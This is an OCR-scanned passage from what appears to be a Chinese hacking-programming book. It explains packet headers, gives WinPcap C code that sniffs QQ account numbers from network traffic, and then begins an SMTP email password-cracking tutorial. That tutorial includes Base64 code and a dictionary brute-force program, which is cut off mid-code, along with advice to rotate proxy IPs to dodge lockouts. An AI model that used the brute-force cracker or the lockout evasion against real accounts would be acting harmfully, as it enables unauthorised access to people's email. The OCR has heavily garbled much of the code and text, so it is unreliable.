Fragment offset: @ 
Time to live: 64 


Protocol: TCP (6) 


» Header checksum: Ox1339 [validation disabled] 
Source: 192.168.1.193 








图 9-2 TCP 协议 号 图 9-3 UDP 协议 号 


在 图 9-1 至 图 9-3 中 ， 都 是 在 WireShark 中 对 PP 数据 包 进 行 的 截图 ， 在 图 中 可 以 看 到 一 
个 字段 Protocol; 该 字段 就 标识 了 IP 层 上 层 对 应 的 协议 。 图 9-1 中 ， 上 层 协 议 对 应 的 是 ICMP 
协议 ， 它 的 协议 号 为 1; 图 9-2 中 ， 上 层 协议 对 应 的 是 TCP 协议 ， 它 的 协议 号 为 6; 图 9-3 
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中 ， 上 层 协 议 对 应 的 是 UDP 协议 ， 它 的 协议 号 是 17。 

在 编写 抓 包工 具 时 ， 获 得 一 个 网 络 层 的 数据 包 时 ， 解 析 完 网 络 层 的 数据 包 以 后 ， 要 接着 
解析 数据 包 的 上 层 协 议 ， 那 么 应 该 按照 哪 种 协议 解析 ， 就 要 知道 它 的 上 层 协 议 号 。 同 理 ， 网 
络 协议 在 实际 拆 包 时 也 是 通过 相应 的 协议 号 进行 的 。 

在 介绍 套 接 字 的 内 容 时 ， 介 绍 了 协议 号 ， 这 里 的 协议 号 指 的 是 网 络 层 用 于 标识 其 上 层 协 
议 的 协议 号 。 对 于 数据 链 路 层 而 言 ， 在 其 数据 结构 中 也 同样 有 相应 的 标识 ， 用 于 识别 在 数据 
链 路 层 拆 包 后 ， 该 交 由 哪个 协议 再 次 解析 拆 包 。 

3. WinpCap 捕获 本 机 的 QQ 号 码 

下 面 通 过 一 个 实例 来 演示 一 下 TCP/IP 协议 数据 包 的 解析 。 打 开 WireShark， 选 择 激活 的 
网 卡 进行 抓 包 ， 在 过 滤 筛 选 框 中 输入 “oicq” 来 筛选 出 QQ 软件 通信 数据 ， 然 后 来 查看 QQ 
的 数据 包 ， 从 而 找到 QQ 号 码 ， 如 图 9-4 所 示 。 





























Protocol Length Info 
oICQ 73 0ICQ Protocol 
OICQ 121 OI€Q Protocol 
OICQ 121 OICQ Protocol 








| 3071 1837.493913 
| .3873 1641.5537143 
3074 1044.198661 





图 9-4 ”WireShark 筛选 数据 





在 图 9-4 中 ， 在 WireShark 的 过 滤 栏 中 输入 “oicq” 后 ， 在 列表 中 只 显示 关于 “OICQ 协 
议 ” 的 相关 信息 ,“OICQ 协议 ”是 WireShark 中 显示 的 ， 注 意 观 察 “Protocol” 列 。 选 中 某 一 
列 数据 ， 然 后 查看 WireShark 解析 的 数据 。 首 先 查 看 Frame 信息 ， 如 图 9-5 所 示 。 





lInterface id: 9 (\Device\NPF {73E81993-F485-4662-88C2-CB1594CD3470}) 


Frame 2969: 97 bytes on wire (776 bits), 97 bytes captured (776 bits) on interface 8 
Encapsulation type: Ethernet (1) 








图 9-5 打开 的 网 络 接 口 卡 标识 


在 图 9-5 中 显示 了 Frame 信息 中 一 条 比较 关键 的 信息 ， 即 “JInterface id”， 它 是 在 启动 
WireShark 时 选择 打开 的 网 卡 设备 的 表示 。 在 使 用 Winpcap 开发 包 开 发 数据 分 析 工 具 时 ， 首 
先 都 会 打开 设备 的 ， 因 此 我 们 这 里 需要 记 住 这 个 “Interface id” 的 值 。 看 数据 链 路 层 的 数据 ， 
如 图 9-6 所 示 。 


Ethernet II, Sre: IntelCor_b7:8a:45 (Mi sm) Ds :ee ya 
Destination: WY) 
Source; IntelCor b7:8a:45 (mw i] 
Type: IPv4 (8x8880) 


图 9-6 数据 链 路 层 信息 



















图 9-6 是 数据 链 路 层 的 数据 信息 ， 它 给 出 了 目的 MAC 地 址 和 源 MAC 地 址 , 还 给 出 了 一 
个 Type， 这 个 Type 表示 了 上 层 服务 所 使 用 的 协议 ， 比 如 该 值 为 0x0800 时 表示 上 层 数据 是 IP， 
值 为 0x0806 时 表示 上 层 协议 是 ARP 协议 。 在 图 9-6 中 可 以 看 出 type 的 值 是 0x0800， 表 示 上 
层 协 议 是 了 下 协 议 。 在 WireShark 中 查看 IP 协议 ， 如 图 9-7 所 示 。 





中 
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4 Internet Protocol Version 4, Src; TIE IT Dst: Tm 
8189 .,.. = Version: 4 


.... O101 = Header Length: 28 bytes (5) 

Differentiated Services Field: 9x88 (DSCP: CS9，ECN: Not-ECT) 
Total Length: 83 

Identification: Bx4dba (19898) 

Flags: 9x90 

Fragment offset: 0 


Time to live: 64 

Protocol: UDP (17) 

Header checksum: Bxal62 [validation disabled] 
Source : gs 

Destination: nui 

[Source GeoIP: Unknown] 

[Destination GeoIP: Unknown] 





图 9-7 网 络 层 信息 


9-7 是 全 协议 的 数据 ， 其 中 Version 表示 卫 协议 的 版 本 号 ，Source 是 源 地 址 、Destination 
表示 目的 地 址 ， 其 中 我 们 关心 的 是 Protocol， 这 里 的 Protocol 类 似 数据 链 路 层 的 Type， 它 也 
表示 了 上 层 的 所 使 用 的 协议 ， 比 如 该 值 为 1 时 表示 上 层 协议 是 ICMP 协议 ， 值 为 6 时 表示 上 
层 协 议 是 TCP 协议 ， 值 为 17 时 表示 上 层 协议 是 UDP。 在 图 9-7 中 Protocol 的 值 为 17， 表 示 
上 层 协 议 是 UDP 协议 。 看 完 IP 协议 后 ， 来 查看 UDP 协议 ， 如 图 9-8 所 示 。 

4 Usen Datagram Protocol, Src Port: 4026 (4026), Dst Port: 8966 《8606) 
Source Port: 4626 


Destination Port: 8866 
Length: 63 


; Checksum: Gxa598 [validation disabled] 
[Stream index: 34] 





图 9-8 ”传输 层 信息 


图 9-8 是 传输 层 的 UDP 协议 ,UDP 协议 非常 简单 ,在 WireShark 中 值 显示 了 长 度 (Length)、 
源 端 口号 Source Port)、 目 的 端口 号 (Destination Port) 和 校 验 和 “Checksum〉 四 个 值 。 对 
于 前 面 的 数据 链 路 层 ， 对 我 们 来 说 比较 重要 的 是 type; 对 于 网 络 层 ， 对 我 们 来 说 比较 重要 的 
是 Protocol， 而 在 传输 层 这 部 分 对 我 们 重要 的 就 是 Port 了 。 在 进行 抓 包 的 时 候 ， 首 先 得 到 
的 是 数据 链 路 层 的 数据 ， 然 后 通过 数据 链 路 层 来 判断 type 是 否 为 0x0800， 从 而 判断 其 上 层 
是 否 为 IP 协议 ， 如 果 是 卫 协议 ， 那 么 就 要 关心 它 的 Protocol 是 否 为 17， 即 传输 层 协议 是 
否 使 用 了 UDP 协议 ， 如 果 UDP 数据 包 中 的 目的 端口 是 8000， 那 么 就 与 可 能 该 通信 是 QQ 
的 通信 ,然后 通过 进一步 来 判断 是 否 是 “OICQ 协议 ”来 得 到 QQ 号 , 在 WireShark 中 查看 ， 
如 图 9-9 所 示 。 4 OL = 1M 站 FE popdlar Jn CHaAa 

图 9-9 是 WireShark 对 QQ 通信 数据 包 的 Flag: Oicq packet (6x02) 


Version: Ox3661 


解析 , 其 中 首先 Flag 表示 该 消息 是 QQ 的 数据 人 

包 ， 然 后 Version 是 版 本 号 ， 接 着 Command 是 eh sender is client): Wsaiaiaa 

消息 的 类 型 ， 消 息 的 类 型 可 以 有 多 种 ， 比 如 

“Receive message〔 接 收 信息 )”、“Heart Message 

(心跳 )”“Download group friend” 等 。 在 Command 之 后 的 Sequence 是 序号 ， 接 着 就 是 QQ 

的 号 码 了 。QQ 号 码 在 整个 数据 包 的 第 7 个 字 节 的 位 置 处 (从 0 开始 ) 开始 的 4 个 字 节 长 度 。 
有 了 上 面 的 分 析 ， 就 可 以 通过 WinpCap 完成 一 个 通过 抓 包 获取 本 地 QQ 号 码 的 程序 了 。 


图 9-9 应 用 层 信 息 
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WinpCap 是 Windows packet capture 的 缩写 ， 它 是 Windows 操作 系统 下 用 于 捕获 网 络 数据 包 





pe 并 进行 分 析 的 开源 库 。 许 多 优秀 的 网 络 工具 都 是 依赖 它 开发 的 ， 比 如 WireShark、Cain 等 。 

章 | 对 于 使 用 它 也 非常 容易 ， 只 要 下 载 其 SDK 开发 包 将 其 引入 项 目 即 可 。 
获取 本 机 QQ 号 码 的 代码 如 下 : 

黑 #include <pcap.h> 

客 #include <winsock2.h> 

编 

程 

实 #pragma comment (lib, "wpcap") 

例 #pragma comment (lib, "Backet") 
#pragma comment (lib, "ws2.32") 

| /* 4 bytes LIP address */ 


typedef struct ip,address 
{ 

u_char bytel; 

uchar byte2; 

char bytesy 

uchar byte47 
}ip address; 


| /yx TBX4 header */ 
typedef struct ip_ header 
{ 
ut aha Ver ihl; 
Ca 让 SP 
Do Kok og wa i = oy 
Cushort dentithecationy, 
sorne tiagsrfos 
uchar Ch 
uchar Botos 
tu slort Cres 
ip.Laddress Sadar: 
ip address daddr; 
Tne ep _ pad; 
Fip header; 


/* UDP header*/ 
typedef struct udp header 
时 
ushort sport; 
Wort dBAart, 
UU shnort em 
Sort leresr 
judp, header; 


/* Q0 header +*/ 
#pragma pack(push,1) 
tvbedet struct agq. header 
{ 
u_char ao 
ushort version; 
ushort command; 
usheort seq; 
pi qq number; 
head header; 
#pragma pack (pop,1) 


#define UDP_SIGN 二 A/ UDP 协议 标识 
#define QQ SER PORT 8000 // QQ9 使 用 的 端口 号 
#define QQ.SIGN '\x027 // QQ 协议 标识 


/* prototype of the packet handler */ 
void packet "handler (tu char *param, const struet pcap.pkthar *header, const Gu ehar * 
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pkt _ data):; 


int tmain(tint arge, TCHAR* argvl]) 


{ 


pcap_if t *alldevs = NULL; 
Peap lt rt *d.=" NULLY? 


int i = (03 

int me 

pcap.t *adhandle = NULL; 
char errbuf [PCAP ERRBUF SIZEB] = {0 }; 
We te netmask; 

char paeket filtertj's "ip nd GD 


struct bpf program fcode; 


/* 查找 机 器 上 所 有 可 以 使 用 的 网 络 接 口 */ 

if( pcap, findalldevs (&alldevs, errbuf) == -1 ) 

{ 
fprintf(stderr, "Error'in poap findalldeves s\n', errbuat)s 
人 

} 


/* 输出 网 络 接口 列表 */ 
for(l d= alldevs; Gy d= d->next) 
{ 
和 A) 
if (d->description) 
{ 
BeintE( (s\n dd8sCription)s 
&lse 
{ 
printf(" (No description available) \n"); 


} 


LE 

{ 
printf("\nNo interfaces found! Make sure WinPpcap is installed.\n'); 
TETEr 


} 


// 选择 要 监听 的 网 络 接口 
printf ("Enter the interface number (1-%d):",i); 
scanF ("sd Enam)y 


/* Check if the user specified a valid adapter */ 
和 在 ET < mam Ey 
{ 

printf("\nAdapter number out of range.\n"); 


/* Free the device Jist */ 
peap, freealldevs(alldevs); 
Celtarn 元 灿 》 


} 
/* 获得 选择 的 网 络 接口 */ 


for(ndls dllhdeve,'d, OF Le inum = Te ds ,Qnexrt, Fh ); 


/* 打开 网 络 适配器 */ 


adhandle = Pcab open live (d->name, // 设备 名 称 





65536， // 65535 保证 能 捕获 到 不 同 数据 链 路 层 上 的 每 个 数据 包 的 全 部 内 容 


Ty // 混杂 模式 
1000， ” // 读 取 超时 时 间 
errbuf);// 错误 缓冲 区 
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} 


if ( adhandle == NULL ) 
:| 
fprintf(stderr, "\nUnable to open the adapter. %s, is not supported by Winpcap\n"); 
/* 释放 设备 列表 */ 
pcap freealldevs (alldevs); 
return =1; 


} 


/* 检查 数据 链 路 层 ， 为 了 简单 ， 我 们 只 考虑 以 太 网 */ 
if (peap datalink(adhandle) != DLT EN10OMB) 
{ 
fprintf (stderr, "\nThis program works only on Ethernet networks.\n"); 
/* 释放 设备 列表 */ 
pcap freealldevs (alldevs); 
return =1? 


if( d->addresses != NULL ) 


/* 获得 接口 第 一 个 地 址 的 掩 码 */ 


netmask=( (struct sockaddr in *) (d->addresses->netmask))->sin addr.Ss un.S addr; 


else 


/* 如 果 接 口 没 有 地 址 ， 那 么 我 们 假设 一 个 c 类 的 掩 码 */ 
netmask=0xff£f0000; 
} 


/7 编译 过 滤 规 则 
if (pcap compilel(ladhandle, &fcode, packet filter, 1, netmask) <0 ) 
{ 
fprintf (stderr, "\nUnable to compile the packet filter. Check the syntax.\n"); 
/* 释放 设备 列表 */ 
pcap_ freealldevs (alldevs); 
return -13 


} 


// 设置 过 滤 规 则 
if (pcap_ setfilter(adhandle, &fcode)<0) 
{ 
fprintf(stderr,"\nError setting 七 he filter.N\n”); 
/* 释放 设备 列表 */ 
pecap freealldevs (alldevs);? 
return ~17 
} 


printf("\nlistening on $s...\n", d->description); 


/* 释放 设备 列表 */ 
pcap_ freealldevs (alldevs); 


/* 开始 捕获 */ 
printf ("开始 捕获 数据 : NzNn") ， 


// packet handler 是 回调 函数 
pcap_loop (adhandle, 07 packet handler, NULL); 


return 0: 


/= 每 次 捕获 到 数据 包 时 ，1ibpcap 都 会 自动 调用 这 个 回调 函数 */ 
void packet _ handlec(a char *param, const struct pcap pkthdr *header, const u_char * 
pkt_data) 


人 


ip header *ih = NULL; 

Udp header *uh = NULL; 

UU int ip_len = 0» 

ushort sport = 0, dport = 0; 
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qq header *qgqh = NULL; 
PBYTE pByte = NULL; 


/* 获得 IP 数据 包头 部 的 位 置 */ 
ih = (ip'header *) (pkt data + 14); // 14 是 以 太 网 头 部 长 度 
/* 获得 UDP 首部 的 位 置 */ 


ip len = (hs>veroihl & OxEN  *. 47 


// 判断 是 否 为 0DP 协议 
ji ( ih->proto == UDPE SIGN ) 
{ 
uh = (udp header *) ((u char*)ih + 1p len); 
/* 将 网 络 字 节 序列 转换 成 主机 字 节 序列 */ 
sport = ntohs( Uh->sport ); 
dport = ntohs( uh->dport ); 


// 判断 源 端口 或 目的 端口 是 否 为 8000 
if ( sport == QQ SER_PORT || dport == QQ _ SER PORT ) 
{ 

pByte = (PBYTE)ih + 1p len + sizeof (udp header); 


if ( *pByte == QQ SIGN ) 
{ 


gh = (qq header *)PByte7 
int n = ntohl (gqh->qq number); 
Printf£{"QQ = Su Sd.%d.%d.%d:$sd -= > $d.sd.%d.%d:%d\r\n", 
ny 
in->saddr.bytel, 
ih~>saddr .byte2, 
ih->saddr.byte3, 
ih->saddr.byted4; 
sport, 
ih=->daddr .bytel., 
ih->daddr .byte2, 
ih->daddr .byte3, 
ih->daddr .byte4, 
dport); 


} 

1 

代码 一 共 分 为 3 部 分 ， 第 一 部 分 是 定义 了 相关 的 结构 体 和 一 些 和 常量， 比如 定义 了 关于 IP 
协议 的 结构 体 、UDP 协议 的 结构 体 和 QQ 的 结构 体 ， 还 定义 了 关于 UDP 标识 和 QQ 标识 的 
常量 。 第 二 部 分 是 main 函数 的 部 分 ， 这 部 分 几乎 是 通用 的 ， 这 部 分 可 以 从 WinpCap 手册 中 
获得 ， 主 要 是 获取 本 机 中 的 所 有 网 络 适 配器 ， 然 后 打开 并 设置 编译 过 滤 字 符 串 ， 最 后 开启 嗅 
探 。 第 三 部 分 是 packet handler 函数 ， 该 函数 是 对 数据 包 的 解析 。 如 果 是 开发 简单 的 协议 分 
析 的 工具 基本 就 是 这 3 部 分 ， 比 如 解析 以 太 网 、IP、TCP、ARP 等 ， 都 是 先 定 义 其 结构 体 ， 
在 主 函 数 中 打开 网 络 接口 、 设 置 过 滤 规 则 、 设 置 解析 的 回调 函数 ， 在 回调 函数 中 按照 每 层 协 
议 的 具体 格式 进行 解析 。 

示例 中 的 代码 ， 使 用 回调 的 方式 来 对 数据 包 进 行 解析 ， 也 可 以 使 用 循环 的 方式 解析 ， 但 
是 当 解 析 的 数据 量 过 多 的 时 候 ， 用 循环 的 方式 编写 显得 就 不 那么 规整 了 。 代 码 在 VS2012 下 
进行 编译 连接 ， 运 行 如 图 9-10 所 示 。 

本 程序 并 没有 实际 的 作用 , 目的 是 让 读者 了 解 TCP/IP 协议 的 拆 包 过 程 , 并 了 解 WinpCap 
库 的 基本 使 用 方法 。 
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图 9-10 ”WinpCap 获取 结果 


spy 注 : WinpCap 是 一 个 功能 强大 的 网 络 库 ， 更 详细 的 使 用 请 参考 WinpCap 的 手册 。 


4. 网 络 安全 简介 

在 网 络 协议 的 不 同 层次 中 有 不 同 的 网 络 安全 问题 ， 比 如 在 数据 链 路 层 存 在 MAC 欺骗 、 
MAC 泛 洪 、ARP 欺骗 等 安全 问题 ， 在 网 络 层 存在 IP 欺骗 、Smurf 攻击 、ICMP 攻击 、 地 址 
扫描 等 安全 问题 ， 在 传输 层 存在 TCP 欺骗 、TCP 拒绝 服务 、UDP 拒绝 服务 、 活 动 端口 扫 米 
等 安全 问题 ， 在 应 用 层 存 在 缓冲 区 溢出 攻击 、Web 应 用 攻击 、 病 毒 、 木 马 等 安全 问题 。 每 一 
层 都 涉及 众多 的 网 络 安全 问题 ， 但 是 每 一 层 都 有 相对 应 的 解决 方案 。 比 如 针对 网 络 的 底层 有 
站 和 网 络 层 )， 针 对 高 层 有 WAF、ADS 等 设备 ， 针 对 入 
受 的 有 IDS、IPS 等 ， 甚 至 还 有 读者 们 经 党 使 用 的 简单 的 反 病 毒 系统 、 终 端 安全 系统 等 。 


本 章 会 针对 一 些 常见 的 网 络 攻击 软件 来 进行 分 析 和 介 绍 ， 更 多 的 是 希望 读者 在 读 过 本 章 
以 后 ， 将 来 在 深入 学 习 网 络 及 网 络 安全 时 能 有 感性 的 认识 ， 而 不 是 枯燥 地 学 习 理论 。 比 如 在 


学 习 网 络 时 ， 可 以 通过 WinpCap 编写 自己 的 网 络 协议 解析 工具 ， 也 可 以 在 将 来 更 深入 地 学 习 
网 络 攻 击 、 防 范 或 检测 中 编写 属于 自己 的 工具 。 


9.2 网络 中 的 破解 


网 络 破 解 是 一 种 很 常用 的 攻击 手法 ， 虽 然 看 似 技术 含量 很 低 ， 但 是 往往 效果 会 很 好 。 本 
节 主 要 讲解 关于 E-mail 和 Ftp 的 网 络 破解 。 


9.2.1 电子 邮箱 的 破解 


收发 电子 邮件 经 常 使 用 的 协议 有 SMTP 协议 和 POP3 协议 ，SMTP 协议 主要 用 于 邮件 的 发 
送 ， 而 POP3 协议 主要 用 于 邮件 的 接收 。 本 节 主 要 通过 SMTP 协议 来 完成 对 电子 邮箱 的 破解 。 


9.2 网络 中 的 破解 





1. SMTP 的 手工 模拟 

SMTP (Simple Mail Transfer Protocol) 即 简单 邮件 传输 协议 ， 它 是 基于 TCP 协议 邮件 传 
输 协议 ， 它 主要 用 于 邮件 的 发 送 ， 它 的 TCP 端口 号 是 25。 这 里 通过 一 次 简单 的 手工 模拟 来 
简单 地 讲解 STMP 的 登录 过 程 。 

在 进行 模拟 之 前 ， 需 要 准备 一 台 已 经 注册 过 账号 的 SMTP 服务 器 网易、 腾讯 的 邮箱 都 
支持 SMTP 服务 。 这 里 ， 我 随便 使 用 了 一 台 
SMTP 服务 器 ， 模 拟 过 程 如 图 9-11 所 示 。 

在 登录 的 过 程 中 如 果 看 到 235， 那 么 说 明 登 
录 成 功 了 。 那 么 ， 我 们 来 分 析 一 下 上 面 的 步骤 。 

首先 ， 需 要 使 用 telnet 来 登录 smtp 服务 器 ， 
比如 telnet smtp.xxx.com 25， 也 就 是 连接 义 义 义 
的 smtp 服务 器 地 址 ， 指 定 端口 号 为 25 号 端口 。 

接着 ， 输 入 HELO smtp.X X X.com， 该 命令 标识 发 件 人 的 身份 。 

再 下 来 输入 auth login 用 来 告诉 服务 器 要 进行 身份 的 验证 了 ， 当 输入 auth login 后 ， 服 务 
器 会 返回 334，334 后 面 的 一 串 字 符 是 经 过 base64 编码 的 字符 串 ， 将 其 解密 后 的 内 容 是 
“Username:”。 

在 此 处 输入 经 过 base64 编码 的 “用 户 名 ” 即 可 。 当 输入 用 户 名 回 车 后 ， 会 接着 返回 一 个 
334，334 后 面 的 仍然 是 一 串 经 过 base64 编码 的 字符 串 ， 将 其 解密 后 的 内 容 是 “Password:”。 

在 Password 后 面 输入 经 过 base64 编码 的 “密码 ” 即 可 。 此 时 ， 如 果 用 户 名 和 密码 正确 
的 话 ， 那 么 就 会 返回 235， 表 示 登 录 成 功 。 

对 于 模拟 登录 而 言 ， 掌 握 到 这 一 步 就 已 经 足够 了 。 


图 9-11 SMTP 登录 过 程 


子 和 注 : 在 进行 测试 时 ， 如 果 手 头 没 有 进行 字符 串 转 换 的 base64 编码 工具 的 话 ， 可 以 在 搜索 引擎 中 搜索 “base64 
编码 ”， 就 会 有 许多 的 在 线 base64 编码 工具 的 。 


2. 邮箱 的 破解 

有 了 上 面 的 关于 SMTP 协议 登录 的 步骤 以 后 , 完全 可 以 使 用 WinSock 来 实现 邮箱 密码 的 
破解 。 要 破解 邮箱 密码 需要 准备 四 个 部 分 ， 首 先是 破解 程序 ， 然 后 是 字典 ， 还 有 一 个 就 是 代 
理 IP 地 址 池 。 破 解 程序 是 由 我 们 自己 完成 的 程序 ， 字 典 是 用 来 测试 的 各 种 密码 ， 代 理 全 地 
址 池 主 要 是 为 了 避免 邮箱 地 址 的 服务 器 设置 了 登录 失败 的 次 数 , 在 尝试 登录 失败 N 次 以 后 可 
能 会 锁定 IP 地 址 ， 有 的 甚至 会 锁定 账户 ,这些 属于 服务 器 配置 上 的 安全 策略 。 我 们 的 主要 任 
务 是 完成 破解 程序 的 编写 ， 至 于 其 他 的 就 不 多 考虑 了 ， 那 属于 读者 自行 拓展 的 范畴 了 。 

对 于 自己 写 程序 ， 也 需要 考虑 两 方面 ， 一 方面 就 是 用 WinSock 来 进行 与 SMTP 服务 器 的 
通信 ， 另 一 方面 是 如 何 将 用 户 名 或 密码 转换 为 base64 编码 。 

(1) base64 编码 相关 代码 

在 邮件 的 传输 过 程 中 ， 为 了 提高 传输 抗 干扰 性 或 出 于 安全 性 的 考虑 ， 会 对 邮件 进行 一 定 
的 编码 。 最 常见 的 编码 方式 即 为 Base64 编码 。 它 的 编码 和 解码 算法 都 是 很 容易 的 ， 编 码 后 的 
长 度 是 编码 前 长 度 的 34%。 

它 是 一 种 编码 算法 ， 也 有 人 称 为 Base64 加 密 ， 其 实 它 并 不 是 加 密 算法 ， 毕 竟 没 有 密 钥 ， 
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只 是 把 字符 的 编码 格式 进行 了 重新 编排 。 

Base64 的 编码 规则 是 ， 在 编码 时 ， 采 用 特定 的 65 个 字符 ， 可 以 用 6 比特 组 成 用 来 表示 
64 个 字符 ,第 65 个 字符 是 “=”， 它 被 用 来 标 出 一 个 特别 的 处 理 过 程 。 该 编码 采用 24 比特 作 
为 一 个 输入 组 , 输出 为 4 个 编码 字符 ， 这 个 24 比特 是 由 3 个 8 比特 按 从 左 往 右 组 成 的 ， 被 分 
为 4 组 ， 每 组 就 是 6 比特 ， 在 其 中 每 组 均 添 加 2 个 0 比特 ， 这 样 就 组 成 了 一 个 数字 ， 这 个 数 
字 处 于 0 到 63 之 间 。 在 Base64 字符 表 中 ， 可 以 根据 该 数字 查 到 其 对 应 的 字符 。Base64 字符 
表 如 表 9-3 所 示 。 按 这 种 编码 组 成 的 编码 流 必须 严格 按照 一 定 的 顺序 (从 左 往 右 的 顺序 )， 否 
则 就 没有 任何 意义 了 【〔 编 码 不 符合 规范 当然 没有 意义 了 )。 
















































表 9-3 Base64 编码 表 

值 字符 什 字符 字符 字符 
2 c 19 T k 1 
3 D 20 U 37 ] 2 
4 E 21 V 38 m 3 
8 I 25 Wa 42 ys 
9 J 26 43 60 8 
10 下 27 b 61 9 
12 M 29 d 46 让 63 二 
让 Tt de 
Sr nm 


由 原 字符 组 合成 的 总 比特 数目 不 一 定 能 被 正好 分 组 ， 在 最 后 用 “=” 标 注 。 举 例 说 明 吧 。 

把 “UPX” 三 个 字符 转换 成 Base64 编码 ， 编 码 过 程 如 下 。 

把 UPX 三 个 字符 转换 成 二 进 制 为 “01010101 01010000 01011000” 将 3 个 8 位 的 二 进 制 
重新 组 合成 4 个 6 位 的 二 进 制 为 “010101 010101 000001 011000”, 将 4 个 6 位 的 二 进 制 数 转 
换 成 4 个 十 进 制 数 为 “21 21 124”， 查 表 值 对 应 的 字符 是 “VVBY”。 则 说 明 “UPX” 进 行 Base64 
编码 后 为 “VVBY”。 

把 “MSVC” 四 个 字符 转换 成 二 进 制 为 “01001101 01010011 01010110 01000011?， 将 4 
个 8 位 的 三 进 制 重新 组 合成 6 个 6 位 的 三 进 制 为 “010011 010101 001101 010110 010000 11”， 
将 6 个 6 位 的 三 进 制 按照 4 个 一 组 可 以 分 为 两 组 ， 分别 是 “010011 010101 001101 010110” 
和 “010000 11”， 第 一 组 转换 为 十 进 制 后 为 “19 21 13 22” 按照 Base64 编码 表 查 表 为 “TVNW”， 
第 二 组 转换 为 十 进 制 后 为 “16 3”， 按 照 Base64 编码 表 查 表 为 “QD”， 但 是 要 求 4 个 一 组 ， 
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这 里 不 足 4 个 ， 则 用 “=” 补 足 ， 那 么 第 二 组 用 Base64 编码 后 为 “QD==”。 因 此 “MSVC” 
用 Base64 编码 后 为 “TVNWQD==”。 
Base64 编码 和 解码 的 代码 如 下 : 


static const char *codes = 
"ABCDEFGHIJKLMNOPQORSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; 


static const unsigned char mapf256] = { 

Zoe MS HS O00 DD 2 209 ZaS DIO OO O03 ZS 
255F 2530 255,. 2587 255, 2957 209 25755 2065 0 255702550 205 
2557 2000 obor DOG ABST 2 TD IH DI A 2 区 生 王 5 
250 0 OO 2 oS oD 20m oo Moo 2 2 Age 0 
S26 Sn Su boy oe Se Se nab 205 295 
ZO0r 29047 (2907 ZO0N 20D 0 En 2 3 4, Dy 6 
这 8， 9 TQ Wh TA Sn Mo 人 
19, 207 1 22. T3924, 25 209 28057 20505 2855 258 
2537 25m Zr WR 297 30 357 320 33 A Sa a6 
人 
49. SQ ST COP on S50 2OD, OD OOD DOD TOD MID 
2557 QZ55% 2007 2057 A255 2557 22557 ZHI I ZO 20 255. 
DSN ZOD OD 2 (Oman on VO 2 全 5 
2057 20500 OI DB Dy S50 .25 
L557 ZO 2557200 235 ZO ODS GOI LI Dy MSI oy 
DOS DD MD ZO ODD on 2 ZOD OD 57 7D 0 
25537 200 ZO Dr ION A OMT POD DID QD oN TD 
205. 2550 2D 2 2505mu2557 2557) 255, 2D ZB 25D 22950 
os 2 2205 200 2 WoDr 2 ZH 20 2307 2057 
2557 2557 (2097 ZO 209097 OD. 250 2055 OO 205 2657 DD 
2557 2856 25570 255P 2507 2557 2557 255, 259% 2Z55 2057 2557 
35 MODr ZOSr 2Ho 


int base64 encode (const wnsigned char *in, unsigned long len, 
unsigned char *out) 


unsigned long i, len2, leven; 
unsigned char *p? 

/* valid output size ? */ 

len2 = #4 *((len + 2) 7 3)3 

Bp’ = ut 

leven = 3*{(len / 3); 

for ( 主 = 0» < levens += 3) { 


“or = COAdea[dnl0 > 2 
pt = GoOdest (to) wa) << MAY + (Ln SA 
*B+t+ = eodesl GC(Lalll) & Oxf) << 2) + (nl2] >> 6) 
*Bi+ = codes[in[2] & 0x3£f]; 
EA: + SF 
} 
/* Pad dE if néecessary... */ 
TF (< Lem} 4 
unsigned a = in[0]; 
unslgnied DB = (id < len) 2 jinf1] % O07 
unsigned c = 0; 


xpP++ 三 Codes[a >> 2]: 

六 于 二 COGeSE((ta & 3) << 4) + (Bb 2> 4)]3 

pF (Lit Len) ?codeBt (l(b ee Ox Tt (Clo re] ee 
炎 和 千古 = 1 二 07 


} 


/* append a NULL byte */ 
Np = NO 


return p = out; 


} 


int base64 decode(const unsigned char *in, vnsigned char *out) 


斌 将 前 苏 昱 湘 山 吕 小 
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将 珊 甘 啊 酒 山 吧 商 


亨 


unsLogned (Long Wy sme 2 
unsigned char, ce; 
int g' = 3 


for (ws yy 3 2 et = Or inlx) aQr) 4 
c= maplin[lx++]]; 
if (C == 255) return 一 17 


if (CE == 253) continue; 
4E (te ==°254) 4 er = Og} 
t = (6 te 
if (++y == 4) { 
Yin if (z+ 9 > *outlen) 1 return CRYPT BUFEER OVERFLOW; } 


out[z++] = (unsigned char) ({(t>>16)&255); 

if (g > 1) out[z++] = (unsigned char) ((t>>8) &255); 
if (g > 2) out[z++] = (unsigned char) (ta&255) 7 

y= t= 0; 


} 


PetUrR 区 


} 

上 面 给 出 了 关于 Base64 算法 编码 与 解码 的 代码 ， 在 使 用 时 直接 进行 调用 即 可 。 

(2) 破解 程序 相关 代码 

破解 相关 的 代码 在 第 2 章 中 己 经 学 习 过 了 ， 简 单 的 流程 就 是 读 字 典 中 的 密码 、 创 建 socket、 
与 SMTP 服务 器 进行 通信 ， 对 返回 的 结果 进行 判断 ， 当 判断 找到 “235” 时 则 认为 成 功 ， 输 
出 尝试 的 密码 ， 如果 没 有 找到 “235” 则 继续 读 取 字 典 中 的 密码 重复 前 面 的 步 又。 这 就 是 一 个 


破解 某 个 指定 邮箱 账号 的 简单 思路 。 具 体 代码 如 下 : 
// 模拟 一 串 字 典 
char *dict[5] = {"12345", "123456", "12345678", "111", "22222%}; 


int tmain(int argc, TCHAR* argv[], TCHAR* envpl[]) 
{ 
int nRetCode = 0; 


HMODULE hModule = :;:GetModuleHandle (NULL); 
if (hModule != NULL) 


// 初始 化 MEC 并 在 失败 时 显示 错误 
IE (!AfxWinInit (hModule, NULL, ::GetCommandLine(), 0)) 


{ 
// TODO: 更 改 错误 代码 以 符合 您 的 需要 
_tprintf (_T(" 错 误 : MFC 初始 化 失败 \n")); 
nRetCode = 1; 

} 

else 


{ 
// Topo: 在 此 处 为 应 用 程序 的 行为 编写 代码 。 
} 
} 
else 


{ 
// TODO: 更 改 错误 代码 以 符合 您 的 需要 
_tprzintf(_T(" 错 误 : GetModuleHandle 失败 \n"))7 
nRetCode = 1; 

} 


// 初始 化 Winsock 
WSADATA wsaData = { 0 }; 
WSAStartup (MAKEWORD (2, 2), &wsaData); 








9.2 网络 中 的 破解 





// 循环 读 取 字典 


fom En 0 二 <= 村 7 计 本本 


{ 


} 


char nlo0 人 0 }: 
char out [MAXBYTE] = { 0 }; 


SOCKET s = socket (PF INET, SOCK STREAM, 0); 

sockaddr in saddr = { 0 1}; 

saddr.sin family = AF INET; 

// 连接 SMTP 服务 器 

